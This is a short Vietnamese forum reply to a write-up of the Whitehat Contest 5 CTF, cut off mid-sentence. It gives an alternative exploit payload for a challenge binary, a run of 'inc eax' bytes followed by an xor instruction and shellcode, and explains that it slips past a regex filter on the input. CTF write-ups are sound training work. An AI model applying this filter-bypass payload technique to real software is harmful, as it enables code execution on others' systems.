Re: [Write Up] Whitehat Contest lần 5
còn 1 cách exploit nữa không phụ thuộc vào printable shellcode:
payload = "x40"*1019 + "x35" + "x5bx65x56x00" + shellcode
giải thích:
"x40" -> inc eax
"x35" + "x5bx65x56x00" -> xor eax, 0x56655b
shellcode -> run
Vì hàm check regex đó chỉ xét đến byte...